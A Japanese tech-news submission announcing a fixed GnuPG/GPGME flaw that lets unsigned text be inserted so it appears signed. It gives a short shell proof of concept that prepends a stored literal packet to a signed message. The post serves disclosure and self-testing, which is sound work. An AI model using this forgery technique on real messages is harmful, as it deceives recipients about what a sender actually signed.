パスワードを忘れた? アカウント作成
755431 submission
暗号

GnuPG 署名偽装される問題を修正

タレコミ by tamo
tamo 曰く、
GnuPG および GPGME に未署名メッセージ挿入の危険性が発見された。最新版 の GnuPG 1.4.7 および GPGME 1.1.4 で修正されている。 PGP/MIME を使っていれば影響ないが、素朴な使い方であっさり署名偽装されてしまう問題が今まで残っていたことは驚きだ。
お手元の GnuPG でも、ぜひ PoC を試していただきたい。まず署名メッセージを original-signed-message.gpg として保存しておき、以下のようにする。
  echo "適当な挿入文" > foobar.txt
  gpg -z0 --output prefix.gpg --store foobar.txt
  cat prefix.gpg original-signed-message.gpg > forged.gpg
  gpg < forged.gpg
すると、foobar.txt の内容まで署名されているかのように表示されてしまうはずだ。
GnuPG を利用する MUA (メーラー) で status-fd をチェックしないものは、 この影響を受けるので注意が必要だ。
typodupeerror

アレゲは一日にしてならず -- アレゲ研究家

読み込み中...